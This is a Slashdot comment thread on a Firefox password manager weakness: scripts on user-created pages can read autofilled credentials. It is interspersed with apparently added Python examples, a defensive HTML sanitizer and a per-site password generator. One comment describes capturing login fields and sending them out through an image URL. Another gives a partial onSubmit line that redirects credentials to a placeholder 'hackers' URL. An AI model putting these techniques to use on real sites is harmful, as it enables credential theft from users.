Holes Remain Open in Firefox Password Manager 191
juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"
Firefox no longer safe? (Score:4, Funny)
Re:Firefox no longer safe? (Score:4, Funny)
Re:Firefox no longer safe? (Score:5, Insightful)
But they can only "steal" the passwords of that website. They can't steal all your passwords. So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.
Or use Noscript as suggested. Or simply don't use such websites, as they clearly don't think much about users' security.
Re:Firefox no longer safe? (Score:4, Insightful)
This brings up another thought. If the websites in question allow users to post javascript, and there happens to be a login section on that page, then couldn't the user posting the script add an onchange or onkeypress event to the username and password fields to capture the username and password, and then forward the information to their server by creating an img element, and having the username and password passed as GET variables appended to the URL of the img src, which is in fact just a php page that stores the username and password in a database? Seems to me that any site that allows people to post executable javascript is just asking for trouble.
Re: (Score:2)
Re: (Score:3, Interesting)
Re: (Score:2)
Re: (Score:3, Insightful)
Because it's always clear what sites these are?
Re: (Score:2, Insightful)
So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.
I use the same crappy password on a whole bunch of sites. If someone steals it, they can deface my Facebook page, use my nick on IRC, post on Slashdot under my name. Who knows, it might get modded up for once. There are a limited number of nonguessable, easy to remember passwords in my life, I won't waste them on wikis, forums, and myspace.
My bank, bills and credit card each have their own password and username however. As do my computer and email.
Re: (Score:2)
Please. "It is not about safety of the Outlook. It is about safety of ISPs that allows users to insert code in their email."
Re: (Score:2)
Of course, if a website allows visitors to inject javascript, they can steal passwords even if they're not in password manager, just cause a page to come up that looks like the login page and most people will "log back in" using the fake form.
For that matter, according to one study, just saying "Go to example.com and give me your password and I'll send you a candy bar!" will work fine.
Re: (Score:2, Funny)
Get the Firefox patch here [opera.com]
Godsdamnit, I know you're just trying to be funny in the same way as everyone else with their "Ultimate Windows patches", but it isn't.
You could have gone for insightful instead of trolling by writing something along the lines of "Generally, Opera has a much better safety record (the one we know of, anyway), and I prefer the UI."
I really like Opera, I even have it on my 3 phones and my PDA. Plus my 2 laptops, 4 stationaries, and I'm currently reading a book inspired by Opera [wikipedia.org]. (Sorry, bad pun)
Trolling, h
Re: (Score:2)
Possible fix (Score:5, Interesting)
Secure Login extension (Score:4, Informative)
You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login [mozilla.org] extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.
Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.
Re: (Score:2)
Re: (Score:2)
Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.
You should never allow unt
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Well, the exploit in question does deal with some user forging a login form and adding some javascript to a webpage on the domain he's visiting. From the article:
Re: (Score:2, Interesting)
password complexity (Score:5, Interesting)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
In other words...
YOURE DOING IT WRONG.
Re: (Score:2)
And FFS, don't put stupid things like how much a given user is being paid into the LDAP; that's just asking for trouble.
Clarification (Score:5, Informative)
Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript! [noscript.net], an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.
Re:Clarification (Score:4, Interesting)
Take MySpace. How do you want to handle it? Whitelist MySpace as a whole? Then you got no security. Whitelist certain user pages? Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.
The problem is not that certain domains are "evil". Ok, that problem exists, too, but it's a very different problem. The problem is that it's now possible to put malicious script code into user generated content, and that other content on the same server and domain is what people want to see.
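The two posts above (the one describing onkeypress handlers and img-based exfiltration, and this one about malicious script in user generated content) both come down to the same server-side failure: the site serves user-submitted markup on the same origin as its login form without stripping active content. The following is an added example, not code from the thread, heise, or any of the browsers discussed, of an allowlist sanitizer a site could run over user content before storing it. Names such as `UserContentSanitizer`, `sanitize` and the `SAMPLE` fragment are assumptions constructed for this example; the only dependency is Python's standard library.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist of markup a forum or profile page actually needs. Anything not
# listed is dropped: no script, no iframe/object, and no form/input, so a
# user page cannot host a fake login form either.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_URL_PREFIXES = ("http://", "https://", "/")


def safe_url(value):
    """Accept only plain http(s) or relative URLs. Because this is an
    allowlist, javascript:, data: and obfuscated variants fail by default."""
    return value.strip().lower().startswith(SAFE_URL_PREFIXES)


class UserContentSanitizer(HTMLParser):
    """Rebuild a fragment from allowlisted tags and attributes only.

    Everything removed is recorded in `dropped`, so the application can log
    or rate-limit accounts that keep submitting active content.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []
        self._raw_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._raw_depth += 1
            self.dropped.append(f"<{tag}>")
            return
        if self._raw_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Event handlers (onkeypress, onsubmit, onerror, ...) and any
            # attribute not in the allowlist for this tag are discarded.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            if name in ("href", "src") and not safe_url(value):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._raw_depth = max(0, self._raw_depth - 1)
        elif not self._raw_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so a '<' typed in a comment can never open a tag.
        if not self._raw_depth:
            self.out.append(escape(data, quote=False))


def sanitize(fragment):
    """Return (clean_html, dropped_items) for one user-submitted fragment."""
    parser = UserContentSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample containing the kinds of active content the thread
# describes; leak() is an undefined placeholder, not a working payload.
SAMPLE = (
    '<p onmouseover="leak()">Hi <b>there</b></p>'
    '<script>leak(document.cookie)</script>'
    '<a href="javascript:leak()">bad link</a>'
    '<a href="https://example.com/">ok link</a>'
    '<img src="https://example.com/a.png" onerror="leak()">'
    '<form action="https://attacker.invalid/"><input name="pw"></form>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE)
    print(clean)
    print("dropped:", dropped)
```

Running it on `SAMPLE` leaves `<p>Hi <b>there</b></p><a>bad link</a><a href="https://example.com/">ok link</a><img src="https://example.com/a.png">` and reports the script, the three event handlers, the javascript: link and the form as dropped. The allowlist approach matters more than the particular tag set: a blocklist of known-bad attributes is what lets the "adjust the tactic" posts further down this thread win. Serving user content from a separate domain, as the same-origin discussion later in the thread suggests, is the complementary fix for anything the sanitizer cannot express.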
Re: (Score:2, Insightful)
Usually my NoScript when blocking Java has a list of about 5 or 6 current sites running scripts (ad-servers and whatnot, ads.google.com comes up on almost every page), and anything other than the trusted site I'm at NEVER gets whitelisted, it's just not worth the risk. It's a hell of a lot better running a crippled 2.0 website than losing control of what's coming into my computer. I don't need to see all your pretty java crap, and a good site doesn't rely on java to display co
Re: (Score:3, Informative)
Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.
Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.
Browsing websites such as MySpace works fine with
Re: (Score:2)
Re: (Score:2)
Firefox password manager (Score:5, Interesting)
It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.
Re: (Score:3, Insightful)
The fact that a program running on your machine as you can read your passwords is only marginally disturbing.
Re:Firefox password manager (Score:5, Informative)
Once you do that it won't be able to read them either.
Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.
Re: (Score:2)
Re: (Score:2)
Re:Firefox password manager (Score:4, Informative)
Re: (Score:2)
All other options are simply obfuscation. Unless there is a piece of information you add to the mix, all the "ingredients" to reverse it are sitting right there on your HD.
Your rambling commentary above boils down to simply:
Opera obfuscates passwords by default.
Firefox obfuscates passwords by default.
The only difference is your program you used reversed Firefox's. Again, since you did not se
Re: (Score:2)
You just don't get it, do you?
Why didn't the author of this program succeed in deobfuscating my passwords in Opera?
Three reasons:
1) It's closed source, and therefore more difficult to figure out how to get at the passwords
2) The password file is much more heavily obfuscated
3) There aren't as many Opera users out there, and therefore it is less economical to spend time to properly figure out how to get at the passwords (I repeat, the program does attempt to get at Opera's passwords, it merely fails to succeed)
What this boils down to--exac
Re: (Score:2)
Obfuscation is not secure. Period.
The closed source thing is ridiculous, if anyone really cared and had any monetary incentive (and with passwords there surely is) they could easily deobfuscate, closed source or not.
Security through obscurity is never the answer.
The smaller user base *is* legitimate, and a good argument for a browser ecology, but it is not an endorsement of any advantage to Opera's password management.
You should ALWAYS assume passwords that are not encrypted are essentially in the
Re: (Score:2)
Fix what problem?
If Firefox can get to your passwords (without your input), then so can any other program (that has the same privileges). There's nothing that can be done about it.
Re: (Score:2)
Re: (Score:2)
It's right. No matter how creative you want to be, there's nothing that can be done.
Worst case, modify Firefox itself (the source is available) so that it spits out plaintext passwords. In practice you can just as easily (and more conveniently) rip out the de-obfuscation code.
Re: (Score:2)
Well, any program running with user rights can probably read the firefox passwords, since they are not hard for a user to obtain. Just go into "Options" > "Security" > "Show Passwords..." > "Show Passwords" and click "Yes" on the confirmation dialog. You'll see all the stored passwords in plaintext. This means that your passwords can be read without trouble. For instanc
Re: (Score:2)
To clarify (before someone points out my mistake!): I see that Firefox has a "Set Master Password" option in the Security settings. What I should have said was:
Password Managers and Simple Passwords (Score:5, Insightful)
Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."
Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.
I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.
Re: (Score:3, Insightful)
You're right. The real advantage of the password manager is that it's the only reasonable alternative to writing down all of those unique, complex, constantly changing passwords.
Re: (Score:2)
When's biometric security coming for the web? Scan my fingerprint to log into Slashdot?
Re: (Score:2)
That depends on the password manager. Firefox's password manager doesn't automatically create different passwords per site, but the pwdhash extension does. It hashes the site name with a master password to create a strong and site-specific password. There are several extensions that do this but pwdhash is my favorite.
Re: (Score:2)
What'd be nice if Firefox would automatically enter a very complicated random unique password into password signup form, save it, and automatically enter it into relevant password entry boxes. The user wouldn't even need to th
KeePass (Score:2, Informative)
OpenID (Score:2)
Safari?? (Score:2)
I tried it with Konqueror and default KDE 3.5 password saving technology, and no password leaked this way. I wonder if Safari would have problems there.
Re: (Score:2)
My Password Manager is My Brain (Score:2)
With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements. I wis
Re: (Score:2)
Well my solution is to be selective about what passwords get saved. Low-priority things like slashdot and forum logins are fine for password managers. However I memorize, never write down, and never save passwords for financial sites. This keeps the number
Use the Secure Login FF Extension (Score:4, Informative)
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).
https://addons.mozilla.org/en-US/firefox/addon/44
Re: (Score:2)
You could use this extension by itself or combine it with the Secure Login extension.
http://passwordmaker.org/ [passwordmaker.org]
Challenge/Response (Score:4, Insightful)
The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.
My Solution (Score:2, Interesting)
While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.
In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and custo
Fanboi Fix. (Score:2)
Ok, I take that back. Forgot this is Firefox, not Safari.
Maybe I'm doing something wrong (or right...) (Score:2)
I.e., is this more FUD-ey stuff that is very situational than practical?
Kwallet (Score:2)
Re: (Score:2)
Out of curiosity I ran the password stealing test (as well as all of the other Javascript tests) with Konqueror and they all passed with no information leaked.
One nice thing is Kwallet is outside of the browser with access control to various applications. This means that when Konq
Do not use password managers (Score:3, Interesting)
I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionally want to log in from another computer, for some urgent matter, you cannot find what your password was!
On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).
Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.
Not my problem (Score:2)
kwalletmanager (Score:2)
calling BS - should be classed as phishing (Score:3, Insightful)
This is the same old whore in new shoes. A javascript text entry masquerading as something else. You may as well point in apache's direction for htaccess too then.
As long as people do not think about what they are doing with their web browser, you will always have this problem. If people would think about web sites the same way they think about crossing a busy street the problem would be solved.
Use a different password for each site (Score:2, Interesting)
Using a different password for each site is the ultimate in security; however, without a password manager of some sort, it becomes too difficult to manage such a large list of passwords. Thankfully, OSS password managers such as Revelation [codepoet.no] and Figaro Password Manager [sourceforge.net] exist! Personally, I use revelation; however, both are excellent pieces of software!
--
Yahma
BlastProxy [blastproxy.com] - Anonymous & Secure web browsing
ProxyStorm [proxystorm.com] - Anonymous & Secure web browsing
LiarLiar [sf.net] - Open Source Voice Stress Analysis
Use Passwordmaker (Score:2)
Makes it trivial to have different, secure passwords for each site.
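The pwdhash post earlier in the thread and this Passwordmaker post describe the same idea: derive a per-site password from one master password and the site name, so a password stolen from one site is useless on every other. The block below is an added example of that derivation, not code from pwdhash, Passwordmaker or any other project named here. `site_key`, `derive_password` and the iteration count are assumptions constructed for the example; the sample master password is likewise constructed.

```python
import base64
import hashlib
from urllib.parse import urlparse

# PBKDF2 work factor. Constructed value for this example; raise it until a
# derivation takes a noticeable fraction of a second on real hardware.
ITERATIONS = 100_000


def site_key(url):
    """Reduce a URL to the host part a password is scoped to.

    Hypothetical helper: drops scheme, port and path and keeps only the last
    two host labels, so http://www.example.com/login and
    https://forum.example.com:8443/ derive the same password. Multi-part
    public suffixes (example.co.uk collapses to co.uk) are not handled; a
    real tool should consult the public suffix list instead.
    """
    host = (urlparse(url).hostname or url).lower().rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def derive_password(master, url, length=16):
    """Derive a deterministic, site-specific password from a master secret.

    PBKDF2-HMAC-SHA256 with the master password as the secret and the site
    key as the salt: the same master and site always yield the same password,
    a different site yields an unrelated one, and the slow KDF makes
    recovering the master from one leaked site password expensive.
    """
    salt = site_key(url).encode("utf-8")
    raw = hashlib.pbkdf2_hmac("sha256", master.encode("utf-8"), salt, ITERATIONS, dklen=32)
    # base64 output mixes upper/lower case, digits and '+' '/', which most
    # sites accept; truncate to the length the site allows.
    return base64.b64encode(raw).decode("ascii")[:length]


if __name__ == "__main__":
    master = "correct horse battery staple"  # constructed sample master password
    for site in ("https://www.example.com/login",
                 "https://forum.example.com/",
                 "https://example.org/"):
        print(site, "->", derive_password(master, site))
```

The first two URLs print the same password and the third a different one. Note what this does and does not buy you: a site that leaks its own password learns nothing about your other sites, but the master password still has to be strong, because anyone holding one derived password can try to brute-force the master offline, and the KDF only slows that down.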
Better Idea (Score:2)
This means using passwords you can remember, rather than truly strong random passwords, which is a security problem in itself. But with some initial judicial selection of a manual password generation algorithm, this should be doable for most people. If you have a limited set of passwords you use frequently, especially for low value appli
Master Password Timeout 0.2.5 (Score:2)
Next time the browser wants to fill in a blank it asks for the master password; if you don't trust the site just press escape and nothing will happen!
Re:Thank goodness... (Score:4, Funny)
Re: (Score:3, Interesting)
The TSA guy was quoted in the article saying that "Taking lighters away is security theater." Nice to see someone in charge gets it, and, even more cho
Re: (Score:2)
How many sites have the login field on the user generated pages *and* allow users to post javascript?
Few, if any.
Re: (Score:3, Interesting)
Re: (Score:2)
Some sites, such as Slashdot and Wikipedia, use JavaScript, but only for extra functionality. You don't actually need it.
Some sites that do require JavaScript actually are kind enough to tell you if have JavaScript disabled, but there aren't that many that I've noticed.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3, Funny)
Re: (Score:2)
Not being a developer myself, I don't have an idea about how to fix it, but this seems like an awfully sticky technical problem.
Re: (Score:2)
Re: (Score:2, Informative)
Re:Lies, damned lies (Score:4, Informative)
Actually, the IE6 and IE7 password managers will most likely be equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.
From the MSDN website [microsoft.com] I can quote:
So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.
document.location="http://some.hackers.url/collec
Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)
Just stating the obvious, although now I'm actually curious if this works on IE...
Re: (Score:3, Interesting)
The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption
Re: (Score:2)
I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.
Uh, how does the existence of a specific exploit in Firefox make it a less secure browser than IE?
History disagrees with you.
If you can provide some hard evidence that IE is more secure than Firefox, we would all be interested in seeing it.
But we won't be holding our breath, either, for two reasons: one, there is no such evidence; two, you would probably not be capable of providing it even if it existed.
Re: (Score:2, Insightful)
Fanboy here. You're right. Got that outta the way
The problem is not really with the firefox password manager, because
1. Even if you only automatically entered a password with a push mechanism (right-click to fill in password information) then people would still do that on the "bad" scripts. The problem, like most things, is a problem of social hacking. Education is what is needed... maybe make firefox educational as it's logging into various login pages?
2. Remember the problem boils down to using your f
Re: (Score:2)
The problem with IE, was, for the longest time, that it did not provide standard protections. It always allowed the remote server to control the users machin
Re:stupid features (Score:5, Insightful)
Or more specifically: Don't use the internet. How many webmails do you know that don't use a password? You couldn't even write to Slashdot, except anonymously.
> Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?
Yes, a 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be the number one suspects. So far I have never been robbed by the key holders, nor have I ever heard of a case that someone else had been.
> Having something "remember" your passwords defeats the purpose of having passwords.
Not really. It just makes the password behave more like client certificates that automatically identify the client to the server.
Re: (Score:2)
Breaking in to the apartment manager's office in order to steal keys to the other apartments is a pretty common strategy among burglars.
Re: (Score:2)
Half a dozen may be. Mailinator, my trash mail, bucket mail, dodgit, pookmail, and spambob. And don't worry about their domain names either, many of them have multiple domain names that their users donated to them.
Re: (Score:2, Insightful)
Ideally, you should have 8 or more characters in every password (12 or more is good, 16 or more is great), they shouldn't be based on English words or names (or anything else familiar), they should contain non-English characters, and so on. Plus, you should have a unique one for every use and site. I don't know about you, but I visit at least 20 - 30 sites with some regularity. So should I really remember hundreds of randomesque characters?
My
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Most of these 'remembered' passwords are completely useless to me, just some random site requires that I 'create an account' to, say, view the postings in its forums. And that dumb site then requires '6+ mixed case letters with at least one number', when I would be happy with a blank password - there Firefox remembering this password is a nice thing.
Heck, I wouldn't even want to remember what username I have on these sites, I want it to 'just work' - if my co
Re: (Score:2)
There are quite a few suggestions on this thread on how to implement a more secure (but less convenient) password storage, but maybe a hybrid solution would be best ? Say, have a feature to mark a password as 'important', and Firefox would keep it encrypted, and wouldn't send it to webpages until you order to do so (like in Opera)..
Safest password manager in the world (Score:2)
I keep one in my safe, and whenever I forget a password, I consult it. The advantage of having the information offline is that nobody can hack it, and if someone steals your laptop, they don't get your passwords.
Of course, it's not 100% safe, there's the possibility of someone stealing the notebook. But I'm prepared for that case. I don't put the passwords directly, but instead write some hints based on information that only I know. Like "My friend Toby's former street address", and
Re: (Score:2)
This has been proven countless times to be highly vulnerable to social engineering attacks, such as targeted phishing. There is also a strong correlation between use of the "brain" system and persistently choosing weak passwords or reusing passwords across multiple sites.
In other words, it might work very well for you - if you have a good enough memory to sto